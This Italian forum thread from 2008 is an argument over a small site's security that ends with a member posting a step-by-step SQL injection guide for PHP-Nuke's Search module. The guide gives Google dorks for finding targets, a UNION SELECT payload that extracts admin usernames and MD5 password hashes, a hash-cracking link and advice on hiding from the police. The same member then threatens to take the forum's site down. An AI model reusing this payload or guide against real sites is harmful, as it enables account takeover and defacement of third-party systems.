|
|
| Autore | Messaggio |
|---|
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
 |  Oggetto: saverio 6 un fuso!  Gio Feb 28, 2008 3:46 pm | |
| savè ...hai messo il login x amministratori e/o moderatori sull'homepage del sito...
Mettiamo il caso ke io sia un LAMER...so qual'è la tua usurname.x la pass vado a tentativi...e prima o poi la trovo...e posso in qst maniera smanettarti il sito...trova qualke script o bug di sicurezza al più presto!
fin adesso pensavo fosse solo per l'UTENZA!!!! |
|
  | |
andrea
Età : 18
Registrato il : 28/12/07
Messaggi : 422
Localizzazione : PG
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 3:52 pm | |
| tu stai tranquillo... comincia a smanettarci quanto ti pare.. tanto non risolvi nulla!  |
|
| | |
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 3:59 pm | |
| nn ho interessi a farlo era solo un consiglio...sei tu l'autore della cavolata o saverio?
p.s. mettete il login su una pagina "vostra"...nn credere ke i vostri sistemi di sicurezza sn inalterabili...c'è ki ci riesce...e c'è ki ci perde tempo...è un sito carino sarebbe brutto vederlo defacciato |
|
| | |
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 4:09 pm | |
| | andrea ha scritto: | | tu stai tranquillo... comincia a smanettarci quanto ti pare.. tanto non risolvi nulla! |
Mi ero dimenticato...stai tranquillo tu... |
|
| | |
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 4:13 pm | |
| un altra cavolata:
voi fornite il nome degli utenti in linea sul vostro sito e il numero di visitatori...il nome degli utenti sarebbe la vostra usurname xkè nel sito nn sono possibili iscrizioni da utenti esterni...quindi il nome visualizzato nello slide utente in linea è la vostra usurname.... ripeto e dico....sn solo dei consigli...nn ve la prendete a male |
|
| | |
ringhio
Età : 21
Registrato il : 21/12/07
Messaggi : 651
Localizzazione : Catanzaro
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 10:29 pm | |
| diego.. io passerei a una dimostrazione pratica....  |
|
| | |
andrea
Età : 18
Registrato il : 28/12/07
Messaggi : 422
Localizzazione : PG
| | Oggetto: Re: saverio 6 un fuso! Gio Feb 28, 2008 11:28 pm | |
| | diego ha scritto: | | Mi ero dimenticato...stai tranquillo tu... |
E stai tranquillo .. che colui che ha realizzato la struttura di questo sito (il sottoscritto) ha adottato moduli di sicurezza ottimi!
e comunque come fai a dire che il log-in nell'homepage è una cavolata ??
allora in tutti i siti dove avvengono le registrazioni e dove viene utilizzato un log-in form sarebbero sempre a rischio?
il nostro sito sta su piattaforma cms.. la sicurezza viene prima di tutto!
E non si perde nulla del sito.. che ci sono molti servizi tra i quali un backup giornaliero del sito nel relativo dominio su cui poggia la piattaforma e il cosiddetto database mysql... e per cancellare il backup avresti bisogno dei dati relativi al dominio (e qui potresti smanettarci per qualche anno) 
Ja.. stai tranquillo  |
|
| | |
Mrjsv.com
Admin
Età : 19
Registrato il : 13/12/07
Messaggi : 2930
Localizzazione : Catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 1:02 pm | |
| | ringhio ha scritto: | | diego.. io passerei a una dimostrazione pratica.... |
aurè vuoi essere cacciato? |
|
| | |
ringhio
Età : 21
Registrato il : 21/12/07
Messaggi : 651
Localizzazione : Catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 1:09 pm | |
| | ... e che c'entro io? nn ne capisco niente di ste cose... |
|
| | |
Alessandro
Età : 16
Registrato il : 20/12/07
Messaggi : 610
Localizzazione : Catanzaro °Palazzi Gatto°
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 1:11 pm | |
| AhUHAUHAUHA  |
|
| | |
Mrjsv.com
Admin
Età : 19
Registrato il : 13/12/07
Messaggi : 2930
Localizzazione : Catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 1:15 pm | |
| | e poi k ci fai a casa ? ieri potevi anke venire a mangiare fuori |
|
| | |
ringhio
Età : 21
Registrato il : 21/12/07
Messaggi : 651
Localizzazione : Catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 1:21 pm | |
| | ieri nn sn venuto all'allenamento perchè sono dovuto restare a quel cavolo di call center fino alle 9 e mezza... |
|
| | |
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 3:14 pm | |
| | andrea ha scritto: | | diego ha scritto: | | Mi ero dimenticato...stai tranquillo tu... |
E stai tranquillo .. che colui che ha realizzato la struttura di questo sito (il sottoscritto) ha adottato moduli di sicurezza ottimi!
e comunque come fai a dire che il log-in nell'homepage è una cavolata ??
allora in tutti i siti dove avvengono le registrazioni e dove viene utilizzato un log-in form sarebbero sempre a rischio?
il nostro sito sta su piattaforma cms.. la sicurezza viene prima di tutto!
E non si perde nulla del sito.. che ci sono molti servizi tra i quali un backup giornaliero del sito nel relativo dominio su cui poggia la piattaforma e il cosiddetto database mysql... e per cancellare il backup avresti bisogno dei dati relativi al dominio (e qui potresti smanettarci per qualche anno)
Ja.. stai tranquillo |
fai cm vuoi...io volevo darti solo dei consigli...mi faccio gli affaruci miei visto ke ti credi di essere ki sa ki....sarò contento quando digiterò sulla barra degli indirizzi il nome del vostro sito e leggerò "impossibile visualizzare pagina"...xkè credimi succederà.... |
|
| | |
diego
Età : 18
Registrato il : 28/12/07
Messaggi : 130
Localizzazione : catanzaro
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 3:46 pm | |
| In questa guida vi spiegherò come si attua l'SQL Injection sul modulo Search di
un PHPNUKE e come patchare i vulnerabili!!!
Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:
"Powered by PhpNuke"
"allinurl:phpnuke/modules.php?name=Search"
"allinurl:html/modules.php?name=Search"
"inurl:modules.php?name=Search"
Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...
Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"
al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).
Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringa
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
una volta inserita, clicchiamo INVIO, e vediamo il risultato...
Se il sito è vulnerabile al bug, visualizzeremo risultati del tipo
d708cf4edf867f03e5fc2f510912fab1
Contributo di "nome dell admin"
Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40
Argomento: (9 Commenti)
dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e
"nome dell admin" sarà il nick dell'amministratore...
Ora il problema sarà... Come crackare la password in formato MD5?
Facile.. basta andare su http://cracker.b4ck.net/ inserite il codice del bug e vi dirà la password dell admin
VI RIPETO CHE DOVETE PROXARVI PER FARE QUESTO SENO' POTRETE RISCHIARE UNA DENUNCIA.
qst guida l'abbiamo messa in giro con degli amici...e fino adesso a sempre funzionato..fatti un paio di ricerche e noterai ke il nostro anzi vostro mrjsv.com è in lista...NN PROVARE A FARE IL GARGIUTELLO CON ME...io fino adesso sn stato tranquillo e ti ho portato rispetto...stai tranquillo lo dici a tuo fratello |
|
| | |
andrea
Età : 18
Registrato il : 28/12/07
Messaggi : 422
Localizzazione : PG
| | Oggetto: Re: saverio 6 un fuso! Ven Feb 29, 2008 6:07 pm | |
| Il modulo search su questo sito è disabilitato! L'unico messaggio che leggerai sarà Restricted access 
Parli troppo per i miei gusti
io sono tranquillissimo.. se hai qualcosa da dire puoi dirmela sempre in faccia.. scusa ma adesso ho da fare!
P.S. viene effettuato un backup giornaliero del dominio.. anche se avessi accesso al pannello potresti fare quello che ti pare.. noi non perderemo mai nulla.. smettiamola di fare i lamerucci 
Ultima modifica di andrea il Ven Feb 29, 2008 7:04 pm, modificato 3 volte |
|
| | |
|
Indice 
FAQ 
Cerca 
Registrare 
Connessione 
